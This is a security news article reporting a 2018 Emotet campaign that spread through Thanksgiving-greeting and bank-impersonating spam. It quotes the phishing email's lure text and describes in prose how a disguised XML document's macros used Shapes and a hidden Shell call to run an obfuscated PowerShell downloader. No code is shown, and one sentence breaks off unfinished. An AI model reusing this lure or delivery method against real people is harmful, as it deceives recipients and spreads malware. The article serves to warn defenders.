Thanksgiving Phishing Scam Delivers the Emotet Malware
NEWS

Thanksgiving Phishing Scam Delivers the Emotet Malware

The Emotet malware is back in active campaigns, security researchers warned. Apparently, the malware is hiding in documents in spam messages that pretend to be sent from financial institutions, or masqueraded as Thanksgiving greetings for employees.



The last time we wrote about Emotet was a year ago, in November 2017, when the banking Trojan was updated to include a dangerous component which caused serious concerns among the security community – extracting data even over secured connections.

Related:
Our article illustrates some of the techniques that victims can use to remove certain strains of the Emotet banking Trojan
Emotet Trojan Protection Guide: How to Counter the Hacker Attacks

The files could be easily sent using the most popular infection methods. The new reported attacks once again prove that

Researchers have discovered a new variant of the Emotet Trojan said to be able to infect internal networks through self-propagation.
Emotet remains one of the most popular payloads, and that its operators are always looking for new infection methods.

Emotet New Phishing Functionality

The Emotet malware became active at the end of October this year. That is when a new plugin that exfiltrated email subjects and 16KB of the email bodies was detected. This functionality is currently used to improve phishing templates.

The Thanksgiving Phishing Scam

Forcepoint researchers detected a thoughtfully crafted email which included “some cheerful Thanksgiving words”. As reported, this email saw volumes exceeding 27,000 in the period between 07.30 EST and 17:00 EST in a single day. This is what the email body says:

Hi,

In this season of thankfulness, we are especially grateful to you, who have worked so hard to build and create the success of our company. Wishing you and your family a Thanksgiving full of blessings.

Thanksgiving Day Card below.

The document in the email was in fact an XML file pretending to be a .doc file. It expectedly had embedded macros leading to a PowerShell downloader for the Emotet payload. However, it should be noted that:

the document in this case is not the usual .doc or .docx but rather an XML file masquerading as a .doc, and the macro in this instance makes use of the Shapes feature, ultimately leading to the calling of the shell function using a WindowStyle of vbHide. The syntax for the shell function is Shell( pathname, [ windowstyle ] ) where pathname can be a program or script.

Related:
Sophisticated advanced obfuscation ways are being developed by cybercriminals to ensure they can break into your system and hide malware on your computer.
Top 6 Advanced Obfuscation Techniques Hiding Malware on Your Device

The resultant output is a heavily obfuscated command. When deobfucscated, the command revealed the standard PowerShell downloader routinely observed in Emotet campaigns, the researchers added.

Milena Dimitrova

An inspired writer and content manager who has been with SensorsTechForum for 4 years. Enjoys ‘Mr. Robot’ and fears ‘1984’. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles!

More Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.

Share on Facebook Share
Loading...
Share on Twitter Tweet
Loading...
Share on Google Plus Share
Loading...
Share on Linkedin Share
Loading...
Share on Digg Share
Share on Reddit Share
Loading...
Share on Stumbleupon Share
Loading...